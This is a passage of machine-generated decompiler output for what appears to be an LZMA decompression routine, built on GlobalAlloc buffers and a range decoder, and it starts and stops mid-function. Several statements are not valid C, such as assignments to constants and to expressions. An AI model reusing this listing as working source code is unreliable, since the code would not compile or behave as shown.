                                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            								L10:
                                                            								if(_t612 == 0) {
                                                            									L12:
                                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            									goto L15;
                                                            								} else {
                                                            									goto L11;
                                                            								}
                                                            								do {
                                                            									L11:
                                                            									_t612 = _t612 - 1;
                                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            								} while (_t612 != 0);
                                                            								goto L12;
                                                            							}
                                                            							if( *(_t613 - 4) != 0) {
                                                            								GlobalFree( *(_t613 - 4));
                                                            							}
                                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                            							 *(_t613 - 4) = _t535;
                                                            							if(_t535 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            								goto L10;
                                                            							}
                                                            						case 1:
                                                            							L13:
                                                            							__eflags =  *(_t613 - 0x6c);
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 1;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							_t45 = _t613 - 0x48;
                                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                                            							__eflags =  *_t45;
                                                            							L15:
                                                            							if( *(_t613 - 0x48) < 4) {
                                                            								goto L13;
                                                            							}
                                                            							_t547 =  *(_t613 - 0x40);
                                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                                            								L20:
                                                            								 *(_t613 - 0x48) = 5;
                                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            								goto L23;
                                                            							}
                                                            							 *(_t613 - 0x74) = _t547;
                                                            							if( *(_t613 - 8) != 0) {
                                                            								GlobalFree( *(_t613 - 8));
                                                            							}
                                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            							 *(_t613 - 8) = _t535;
                                                            							if(_t535 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								goto L20;
                                                            							}
                                                            						case 2:
                                                            							L24:
                                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            							 *(_t613 - 0x84) = 6;
                                                            							 *(_t613 - 0x4c) = _t554;
                                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                            							goto L132;
                                                            						case 3:
                                                            							L21:
                                                            							__eflags =  *(_t613 - 0x6c);
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 3;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							_t67 = _t613 - 0x70;
                                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            							__eflags =  *_t67;
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							L23:
                                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            							if( *(_t613 - 0x48) != 0) {
                                                            								goto L21;
                                                            							}
                                                            							goto L24;
                                                            						case 4:
                                                            							goto L133;
                                                            						case 5:
                                                            							goto L137;
                                                            						case 6:
                                                            							__edx = 0;
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x34) = 1;
                                                            								 *(__ebp - 0x84) = 7;
                                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            							__esi =  *(__ebp - 0x60);
                                                            							__cl = 8;
                                                            							__cl = 8 -  *(__ebp - 0x3c);
                                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            							__ecx =  *(__ebp - 0x3c);
                                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            							__ecx =  *(__ebp - 4);
                                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            							__eflags =  *(__ebp - 0x38) - 4;
                                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            							if( *(__ebp - 0x38) >= 4) {
                                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                                            								if( *(__ebp - 0x38) >= 0xa) {
                                                            									_t98 = __ebp - 0x38;
                                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                                            									__eflags =  *_t98;
                                                            								} else {
                                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            								}
                                                            							} else {
                                                            								 *(__ebp - 0x38) = 0;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                                            							if( *(__ebp - 0x34) == __edx) {
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								goto L61;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__ecx =  *(__ebp - 8);
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            								goto L41;
                                                            							}
                                                            						case 7:
                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                            							if( *(__ebp - 0x40) != 1) {
                                                            								__eax =  *(__ebp - 0x24);
                                                            								 *(__ebp - 0x80) = 0x16;
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x28);
                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            								__eax = 0;
                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                            								__eflags = __eax;
                                                            								 *(__ebp - 0x58) = __eax;
                                                            								goto L69;
                                                            							}
                                                            							__eax =  *(__ebp - 4);
                                                            							__ecx =  *(__ebp - 0x38);
                                                            							 *(__ebp - 0x84) = 8;
                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            							goto L132;
                                                            						case 8:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xa;
                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x38);
                                                            								__ecx =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                            								 *(__ebp - 0x84) = 9;
                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            							}
                                                            							goto L132;
                                                            						case 9:
                                                            							goto L0;
                                                            						case 0xa:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xb;
                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x28);
                                                            							goto L88;
                                                            						case 0xb:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__ecx =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x20);
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x24);
                                                            							}
                                                            							__ecx =  *(__ebp - 0x28);
                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            							L88:
                                                            							__ecx =  *(__ebp - 0x2c);
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            							goto L89;
                                                            						case 0xc:
                                                            							L99:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xc;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t334 = __ebp - 0x70;
                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t334;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							__eax =  *(__ebp - 0x2c);
                                                            							goto L101;
                                                            						case 0xd:
                                                            							L37:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xd;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t122 = __ebp - 0x70;
                                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t122;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L39:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            								goto L48;
                                                            							}
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								goto L54;
                                                            							}
                                                            							L41:
                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            							 *(__ebp - 0x48) = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								 *(__ebp - 0x40) = 1;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L39;
                                                            							} else {
                                                            								goto L37;
                                                            							}
                                                            						case 0xe:
                                                            							L46:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xe;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t156 = __ebp - 0x70;
                                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t156;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							while(1) {
                                                            								L48:
                                                            								__eflags = __ebx - 0x100;
                                                            								if(__ebx >= 0x100) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x58);
                                                            								__edx = __ebx + __ebx;
                                                            								__ecx =  *(__ebp - 0x10);
                                                            								__esi = __edx + __eax;
                                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            								__ax =  *__esi;
                                                            								 *(__ebp - 0x54) = __esi;
                                                            								__edi = __ax & 0x0000ffff;
                                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                                            								if( *(__ebp - 0xc) >= __ecx) {
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            									__cx = __ax;
                                                            									_t170 = __edx + 1; // 0x1
                                                            									__ebx = _t170;
                                                            									__cx = __ax >> 5;
                                                            									__eflags = __eax;
                                                            									 *__esi = __ax;
                                                            								} else {
                                                            									 *(__ebp - 0x10) = __ecx;
                                                            									0x800 = 0x800 - __edi;
                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            									__ebx = __ebx + __ebx;
                                                            									 *__esi = __cx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									continue;
                                                            								} else {
                                                            									goto L46;
                                                            								}
                                                            							}
                                                            							L54:
                                                            							_t173 = __ebp - 0x34;
                                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            							__eflags =  *_t173;
                                                            							goto L55;
                                                            						case 0xf:
                                                            							L58:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xf;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t203 = __ebp - 0x70;
                                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t203;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L60:
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								L55:
                                                            								__al =  *(__ebp - 0x44);
                                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            								goto L56;
                                                            							}
                                                            							L61:
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx =  *(__ebp - 0x10);
                                                            							__esi = __edx + __eax;
                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								_t217 = __edx + 1; // 0x1
                                                            								__ebx = _t217;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L60;
                                                            							} else {
                                                            								goto L58;
                                                            							}
                                                            						case 0x10:
                                                            							L109:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x10;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t365 = __ebp - 0x70;
                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t365;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							goto L111;
                                                            						case 0x11:
                                                            							goto L69;
                                                            						case 0x12:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 0x58);
                                                            								 *(__ebp - 0x84) = 0x13;
                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							__eflags = __eax;
                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            							goto L130;
                                                            						case 0x13:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								_t469 = __ebp - 0x58;
                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            								__eflags =  *_t469;
                                                            								 *(__ebp - 0x30) = 0x10;
                                                            								 *(__ebp - 0x40) = 8;
                                                            								L144:
                                                            								 *(__ebp - 0x7c) = 0x14;
                                                            								goto L145;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							 *(__ebp - 0x30) = 8;
                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            							L130:
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							 *(__ebp - 0x40) = 3;
                                                            							goto L144;
                                                            						case 0x14:
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            							__eax =  *(__ebp - 0x80);
                                                            							goto L140;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L120;
                                                            						case 0x16:
                                                            							__eax =  *(__ebp - 0x30);
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx =  *(__ebp - 4);
                                                            							 *(__ebp - 0x40) = 6;
                                                            							__eax = __eax << 7;
                                                            							 *(__ebp - 0x7c) = 0x19;
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							goto L145;
                                                            						case 0x17:
                                                            							L145:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							 *(__ebp - 0x50) = 1;
                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            							goto L149;
                                                            						case 0x18:
                                                            							L146:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x18;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t484 = __ebp - 0x70;
                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t484;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L148:
                                                            							_t487 = __ebp - 0x48;
                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                            							__eflags =  *_t487;
                                                            							L149:
                                                            							__eflags =  *(__ebp - 0x48);
                                                            							if( *(__ebp - 0x48) <= 0) {
                                                            								__ecx =  *(__ebp - 0x40);
                                                            								__ebx =  *(__ebp - 0x50);
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            								__eax =  *(__ebp - 0x7c);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								goto L140;
                                                            							}
                                                            							__eax =  *(__ebp - 0x50);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__esi = __edx + __eax;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								 *(__ebp - 0x50) = __edx;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L148;
                                                            							} else {
                                                            								goto L146;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								 *(__ebp - 0x2c) = __ebx;
                                                            								L119:
                                                            								_t393 = __ebp - 0x2c;
                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            								__eflags =  *_t393;
                                                            								L120:
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            									goto L170;
                                                            								}
                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                            									goto L171;
                                                            								}
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            								__eax =  *(__ebp - 0x30);
                                                            								_t400 = __ebp - 0x60;
                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            								__eflags =  *_t400;
                                                            								goto L123;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								 *(__ebp - 0x48) = __ecx;
                                                            								L102:
                                                            								__eflags =  *(__ebp - 0x48);
                                                            								if( *(__ebp - 0x48) <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									 *(__ebp - 0x40) = 4;
                                                            									 *(__ebp - 0x2c) = __eax;
                                                            									__eax =  *(__ebp - 4);
                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                            									__eflags = __eax;
                                                            									L108:
                                                            									__ebx = 0;
                                                            									 *(__ebp - 0x58) = __eax;
                                                            									 *(__ebp - 0x50) = 1;
                                                            									 *(__ebp - 0x44) = 0;
                                                            									 *(__ebp - 0x48) = 0;
                                                            									L112:
                                                            									__eax =  *(__ebp - 0x40);
                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            										_t391 = __ebp - 0x2c;
